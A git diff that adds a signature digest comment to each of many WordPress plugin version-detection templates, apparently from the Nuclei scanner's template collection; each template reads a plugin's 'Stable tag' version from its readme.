a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204891648285c01c7a769928aa38bbf2ac52295bb5f425b707d752030b1dbd48d3022100a9d8ec1f2620be2dab11b438909733e078c97a27b3483fcca158ccda01025cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..aa962bdd81 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205390c7386599d541d11079119479f593dbcda114fcabe82c963e80b4bf2c5e1a022100b2a77db87b83a9d68855645a32dc633b589a9bb4859e2d4214a8365bdfb3fafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..0b1af47ac9 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071ec30396a3129fc00abbd5ff208b334ca07f8af6316990c24b25ef6145129f202207fcbf5656af6a743d825f862bd51a464c4096c04ca40d49f26fbbc7e2d3e305b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..7a8f26bee0 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b621c155d70fed57de7babeb0256e4a5a7eb4e00f1bc1334f654d902ed9b89302200fe52b8f0dd98b448854ece449e63fe8704ffbd26e6321028b6da1b4c2a35d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..1a499d0826 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3e57f210b746191bfb045f586a597518d4b42eb37a9c1a86ad0ab1071534135022100fe68e826fcd988562a9fcb46aad5a618fec13cdcde991673b239b1c85ee58049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..a8fa946525 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097583d480afca357d038cfd614fbc9a62be602685a90c3f50cfc8a272f228a2a022046776e2d83acf98956d3cd2f21ff0926d7007d36b5d51b3be23235664deb89e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..67123d071e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e51e3e164541be9533dbfa3c16577fffab477669d3ab52753f587bd55cc915a102200c1183a98532326d8780dc9f83e3018e7e1da70292d302a9f4885b4e730b5f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..57aae9f70f 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f209e986acb6b2906cce7e14eea508022b107e548ae62ddd4e147b1649ba46cd022100c5994a29ec0e07982a379f7d954bc0c27d6158d5d932f1b0d88ac605c3fe17d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..92c47c987f 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204aa0c1262c15c4e0f66b8f2e7ef694fe15290c68c92a3208deecbb2f4c066740022100f5b6548c716011d935d793e2f100667e84dff6e331a497e7c1d398052043b5ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..4ccac3cbac 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e980d97775e856875fffd7cb4e296922cb2f32071213348af5c67f938d1f88d202206545002d79d49cfbd819eb832d8095e58a678a30f6734abbc203f1539bc24dce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..f3fbe92e51 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202596d45b059302e95f1f536aa712f3bfbe6be86edf145c3e1f7f0820485a667402210087b00adc8e89cd99539041c63d20eff31dc9cdfb0a955ec7f81534bc58bc3b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..d162299f77 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e5b18986fcfbf84bb08cd99b3183906c4697cc533ab00c2a230d0fe6a7eb521022100a6684bcf83c2229a042a5016df70bf987e1da89728624fc4426c5bfe33a9c165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..ea0e6f14ad 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200388d74880f23d041cbb93c238f8bbf6c1bfa4fedebe53060dd7f5022cd493a5022100db4d045dbc316fdf4ceb8b8c9645ee184fd39396ce392099d24bda412d7bc917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..ea25e57680 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef0b41224585d4638781de43a2de2027434e2e5ef1ba0d6d8f5a991ce98bb0c402202a88328b52591c1609a644310a5ca0c3630d062a5614f59955d2dafd8c83c475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..7f4e521ea1 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204387cb61e48dc8126374012ea63c37e0f5cb050f40f87c48ebde4f8ad1c91ef3022049a662c3be31d08a04a17bc92eb25b5a0f8261fd18335f16b670d5cf08f01028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..d16c931621 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f78ee94de4cabd1271c29191691b385a526f09d5ba16ec7274aa4fa161dca073022100d23263c57b9a647d5b976f52bd529be221782b92af998f944a847fdb251b58f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..7fe224ce46 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df62a8b38ce5bec8793c4a0c865eb2f6ef93057dd467a6ed4fe1051df8651bed02205a306e269ddee16e279978d50b9d4990f47a1fb9e10b777749be2176660bafd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..dc89ee7218 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a2e6ff068dafa09759d477c3cba8424e2864c25473dd65c869d70e516ded35a022100abce407a6043e05c53daaa673fdb4a2b51a34e3a2d28978d135a01aa26686432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..03f974a6c2 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b9647dc58f589a31452b86329dfb308526239519a47e9936667af986845c3ce0220521c334192b29f03ada520c9c363187c3fbab7cb670cf1e239758029df11884b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..742801b909 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009284df6b5114e8267390797d5ab4452ecb54be5490fc0ba8be4bf30e4e7bc6b8022017b165734fe473f99513046cd376be9738c51e1eba1ac395662d047399c11705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..c814aac807 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205283270226596da049cff293f3866341df2a284a82d49b222985202df6652fba022059b2901c0519282dea564e6daa5af73721872ed7e81f0cca645568d343016e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..65c218bc2f 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b2cb1b791b9aefef329aa3f663dfde9dba2fd19ce7da03fcc40b2f8ee287966102203a987d857d2a2cf4e131bd09e7c78126955ec7a082ea828f0410c75ad7dcb74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..0855e4ff8c 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038ed80da315806603c0d8c61697be19fa1f7dd3235693c14e13a19effa217679022100f32ef25aef855619a3f0754d077ccba03922300397d85f5b683f728bd67771c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..85ba9cf876 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d6064617b58c3cf378eab666b9e93f2c2cc64f4baf8bcc71bed20fa6bb5ef4602206fdf4d93667e0dbcfb79f86570adfd6011d982efc535b85d69f2b9254eb7cd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..7e13f43caa 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6538d0597ccf9b6b8fb491cb08c88fd7b3d8807dd3ba4d7cdfceac84838e181022100ef4a657e380b293a1ccf2f0602ba62b6b5ad8423788a4de738c468d91d99bb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..b557f3dfea 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe14ae993083769b456d2379fa59049ddab4a63c06c35f30618d3e7fa68cc0cf02210096726782e3e73ed61cef1b74a08e5481a6e9993b76109fc57ee65a1eef619531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..e4b33402dc 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f27b9fc98635b4192d9672ca68c840874a3a8d313cbffacb16b58fe52f5548d022100cf254dffaac2cde7efc5d5b6eef22f402e92828c57e94892c7ed9daa0320fb85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..583ef66909 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203890e8857fe587fe636234043d4e13bc9d5cb8e32e8cff0ee82ca17a1e35efe502206cab840d14881c839c3fe4930788656b5d86584046a7bb483002820edf3c4fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..f2d62dc36d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d53fc1b5f0c164f0549dcd80df48f8c2e613f189f704dfefd6f01c9ead99fff02210088438a5676baa1c1c0932dfcf88558dfb720abcc6d77cd8779956f5bce55eb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..b974d96abf 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d3f4e423ef03bc803879b24d3bcae4df20deb6168d4a1cdd3caa9865c730d180220060a70f82dc001816ff017241aa94b79b66a60753031435a3d252f58dc789c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..c3910e218d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bf4599f4235cbfe3a826eecd1c403e3429927cade9c31727b83ddfaa5626a6f022100f19fedaa62e3f99a63ffe00b68d9bb4355b5ddd197f268ac70d7b4ed651e13bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..a89e00e5c8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084a81d550b427e171d706c983c8daba97f3d00d1cfa0adcf9827c56fc5a3b8f1022100bfb754f6e683b586f5655cf706b8d93642c02466610efa822d858598be636910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..3575d97386 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa2f51f6abd3a92c48d3ddb414552f6cbed90a40e12a9c7825c297de386097a7022100ad3b6efb65077530566190abab491a224b7a1e8dbd21eac1a33244a0b7ed6616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..9cc015b2a3 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013e545d611cf8417a8f41a8f78b17a52adf343565083c2683f688843d36319dc022100910e143ff1c036090c70ee87bb429c39b227a248c6cba6c9528016e01e212441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..29597faa66 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3981099764cff9602451136c49fb4a5ba9a7523a3a0e69d7e2b611226e0e6fd0220313b577fea806575919aedefc5d5e5fce5e557a1ec1a0786c9ac85722ef6a182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..635b8a1ded 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210080b99e0dbbce395139a88a483f8e8ccb4ce10624022aacc37641a668730b9c3f022100d09ededcd00cfb14bdc266d8867ed3cad4e1c1edaf4e1964b8b5352d9981dbc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..686d678dd9 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eff0a17421ffe99cd4096d7dc65d6b6d67abb79c5ece88908d74b6b7a4e3543d02201531c4daaa8b66a6a7da8af9943199c2fb37a491433c112f4b6650a7e68fbbc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..14e51fadcc 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022026e1ad82dd2e0defebe60137e81d5cfa2010bb0fab801de30f83e16b58dfcd4602210086e10172338a2cf4709953d3c51c7511b1a682b20e1b24223628afdf695adac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..22beb2b1ff 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f12c4026812d79307a4f0ca5029181cca8ef59ba2742d3ed61990aa7cbcb4bd20221008a779226712f2ea1b94b86571f4cddca6b2980c7ef2027e494b45a4eb98c2626:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..f35e611d06 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207045d1efe45e92d4a18095273872df7d6e778f5e1f2d5e999dbfef2aa419f189022100a35b44b83324395b4e06e9e26c8fd5da0ac2913474f13b925d222c5c09a34775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..f34ba38188 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db2915045834fef51537f8969add7afbf67ccf4078173df1d4179d585db7d28302204b1ee8a7432f5c21b2bcf2b1afe8d8202379cc6d310d2390b80ef383d424e6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..91da1963c5 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b08a50225fc0df98b1dee2d6c5fd09c4e5547f1e79fe3f200c2c38dd3b9a005b022100ca8d1107742b8b3024b7aeba890667c23c8f30561027257314d0cd6604653227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..76834ec4b1 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d07ce1a6bc0ff429e97e82268f12e5a579cff9d84d4cc3c6312e610cb58e9626022100aab75008b6ccf59c9041e6d5cd7c0cf246b1a970dac31bdae307b768edcf6134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..2c56cca33c 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206db37182fc9b02f29dfd5681cfca2ff0637d8a1d4dd0e56513eedb0304a4f745022041807d32e73a654b0c7e9fe31fb3109c1d17ca4642765786495475380b23b3c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..2d9f0c2f96 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057ef5e7be4402f03e1a195732332ec2804ea117192b049f2144e203d771208880220791392153ff9894df490bc8a639b132d803808a338a010f01514da4fbe66905a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..027724690f 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a0045304302207f0468932db54f7f38108321071c5173acccdc3e57714155b3271bad148d7b1c021f36a66ab27b0286022a6401bb04f688cfea0e8b374ac210b761161b319858b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..bbaa8270f2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008cf100b8857097427d55b4966e2a31009edeb72133237b52ae05118bc762ac4b022070078803bd9864bf36f323fc9a8d69e3cecc7c550d247b70664159f70a96a8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..2340014014 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ 